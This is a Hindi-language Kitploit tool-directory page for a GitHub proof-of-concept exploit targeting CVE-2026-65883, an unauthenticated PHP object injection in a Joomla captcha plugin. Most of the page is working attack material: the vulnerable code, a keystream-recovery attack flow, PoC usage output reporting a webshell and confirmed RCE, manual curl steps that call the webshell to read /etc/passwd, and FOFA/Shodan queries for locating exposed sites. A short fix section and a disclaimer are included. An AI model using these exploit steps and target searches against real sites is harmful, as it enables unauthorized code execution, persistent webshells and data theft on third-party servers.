Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-65883 — Aimy Captcha-Less Form Guard जूमला घटक PHP ऑब्जेक्ट इंजेक्शन RCE। clfgd XOR कीस्ट्रीम रिकवरी + unserialize()। CVSS 10.0 | CWE-502 | aimy_captcha-less_form_guard < 20.1 | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-65883
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubshinthink/cve-2026-65883

CVE-2026-65883

Aimy Captcha-Less Form Guard जूमला घटक PHP ऑब्जेक्ट इंजेक्शन RCE। clfgd XOR कीस्ट्रीम रिकवरी + unserialize()। CVSS 10.0 | CWE-502 | aimy_captcha-less_form_guard < 20.1

रिपॉजिटरी देखें
451 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Python CVE CVSS License

CVE-2026-65883 — Aimy Captcha-Less Form Guard <= 20.0

clfgd फ़ील्ड → XOR पुनर्प्राप्ति → unserialize() → FormattedtextLogger → RCE


अवलोकन

Joomla के लिए Aimy Captcha-Less Form Guard में बिना प्रमाणीकरण के PHP Object Injection। onCheckAnswer() विधि हमलावर-नियंत्रित clfgd POST फ़ील्ड को base64-डिकोड करती है, इसे रिपीटिंग-की XOR से गुज़ारती है, और परिणाम को सीधे unserialize() को दे देती है — ।

कोई HMAC नहीं, कोई allowed_classes प्रतिबंध नहीं, और कोई इंटीग्रिटी जाँच नहीं
फ़ील्डविवरण
CVECVE-2026-65883
उत्पादAimy Captcha-Less Form Guard (Joomla प्लगइन)
CVSS 4.010.0 (गंभीर)
प्रकारCWE-502 — अविश्वसनीय डेटा का डिसीरियलाइज़ेशन
प्रभावित18.0 — 20.0
पैच किया गया20.1 (29 जुलाई 2026)
खोजा गयाValentin Lobstein (Chocapikk) / VulnCheck — 26 जुलाई 2026

प्रभावित संस्करण

स्थितिसंस्करण
असुरक्षित18.0 — 20.0
पैच किया गया20.1 (29 जुलाई 2026)

भेद्यता तंत्र

मूल कारण

plg_captcha_aimycaptchalessformguard में onCheckAnswer() विधि हमलावर-नियंत्रित इनपुट को सीधे unserialize() को भेजती है:

root@kitploit:~
// onCheckAnswer() — pre-20.1
$cld = false;
if (($clfgd = $input->get('clfgd', '', 'RAW'))) {
    $cld = @unserialize(
        XorHelper::crypt( base64_decode($clfgd), self::getXorKey() )
    );
}

XOR "एन्क्रिप्शन" एक Vigenère सिफर है जिसमें प्रति-सेशन कुंजी होती है — कोई प्रमाणीकरण नहीं, केवल ऑब्फस्केशन।

टूटा हुआ एन्क्रिप्शन

root@kitploit:~
// XorHelper::crypt() — repeating-key XOR, period 231
static public function crypt($bytes, $key) {
    $ekey = str_split(self::getHashedKey($key));  // sha512.sha256.sha1 = 232 hex
    $s    = str_split(strVal($bytes));
    $klen = count($ekey);
    for ($i = 0; $i < count($s); $i++) {
        $val .= $s[$i] ^ $ekey[$i % ($klen - 1)];  // period 231
    }
    return $val;
}

कीस्ट्रीम पुनर्प्राप्ति

प्लगइन समान HTML प्रतिक्रिया में सिफरटेक्स्ट और प्लेनटेक्स्ट दोनों प्रस्तुत करता है:

root@kitploit:~
// onDisplay()
$cld->trap_ids = array($id, $trap_id);      // readable from HTML
$cld->mt       = time() + 7;                 // known (server time + 7s)
$html .= '<input name="clfgd" value="'
      . base64_encode(XorHelper::crypt(serialize($cld), $key))
      . '" />';

चूँकि trap_ids (जिसे <span id="..._mark"> और हनीपॉट इनपुट से निकाला जा सकता है) और सिफरटेक्स्ट दोनों HTML में होते हैं, उन्हें XOR करने पर 231-बाइट कीस्ट्रीम के ~94 बाइट पुनर्प्राप्त हो जाते हैं।

हमले का प्रवाह

  1. GET किसी भी कैप्चा-संरक्षित फ़ॉर्म (पंजीकरण, लॉगिन, संपर्क, पासवर्ड रीसेट) पर
  2. निकालें clfgd सिफरटेक्स्ट + trap_ids + टाइमिंग → कीस्ट्रीम के 94 बाइट पुनर्प्राप्त करें
  3. संरेखित करें एक FormattedtextLogger सीरियलाइज़्ड ऑब्जेक्ट ताकि संरचनात्मक बाइट ज्ञात कीस्ट्रीम स्थितियों पर पड़ें
  4. POST निर्मित clfgd → unserialize() → __destruct() → formatLine() → PHP वेबशेल लिखता है
  5. GET /random.php?c=id → www-data के रूप में RCE

अवधारणा का प्रमाण

एकल लक्ष्य

root@kitploit:~
$ python cve_2026_65883.py -t target.com

  Target      : target.com
  Status      : Aimy Captcha-Less Form Guard v20.0
  Form        : /index.php?option=com_users&view=registration
  Keystream   : 94 bytes recovered
  Shell       : a1b2c3d4e5.php
  Gadget      : 1460 bytes
  POST        : HTTP 303
  Shell URL   : https://target.com/a1b2c3d4e5.php
  RCE         : CONFIRMED!

RCE ACHIEVED!
  https://target.com/a1b2c3d4e5.php?c=id

मैन्युअल शोषण

root@kitploit:~
# Step 1 — Get form + recover keystream
curl -sk "https://target.com/index.php?option=com_users&view=registration" \
  | grep -oP 'clfgd" value="\K[^"]+' | base64 -d > /tmp/ct.bin

# Step 2 — Build FormattedtextLogger gadget + XOR encrypt
python cve_2026_65883.py -t target.com -c "id"

# Step 3 — Access webshell
curl -sk "https://target.com/a1b2c3d4e5.php?c=cat+/etc/passwd"

FOFA / Shodan

root@kitploit:~
# Aimy Captcha hidden field
body="clfgd" && body="Joomla"

# Plugin version disclosure
body="aimycaptchalessformguard"

# Shodan
http.html:"clfgd" http.component:"Joomla"

फिक्स (20.1)

root@kitploit:~
// 20.0 (vulnerable)
$cld = @unserialize( XorHelper::crypt( base64_decode($clfgd), self::getXorKey() ) );

// 20.1 (fixed)
$cld = @json_decode( XorHelper::crypt( base64_decode($clfgd), self::getXorKey() ) );

json_decode() PHP ऑब्जेक्ट इंस्टैंशिएट नहीं कर सकता — POP गैजेट चेन टूट जाती है।


प्रभाव

  • पूर्ण RCE — www-data के रूप में मनमाने कमांड निष्पादित करें
  • कोई प्रमाणीकरण आवश्यक नहीं — कैप्चा वाला कोई भी सार्वजनिक फ़ॉर्म एक वेक्टर है
  • Joomla 3.9–5.2.1 — FormattedtextLogger गैजेट सभी संस्करणों पर काम करता है
  • स्थायी — वेबशेल मैन्युअल रूप से हटाए जाने तक बनी रहती है

अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।


संदर्भ

संसाधनलिंक
VulnCheck Blogvulncheck.com/blog/aimy-captcha-less-form-guard-object-injection
IONIX Threat Centerionix.io/threat-center/cve-2026-65883
CVE रिकॉर्डcve.org/CVERecord?id=CVE-2026-65883
NVDnvd.nist.gov/vuln/detail/CVE-2026-65883

Aimy Extensions या VulnCheck से संबद्ध नहीं।

टूल डाउनलोड करें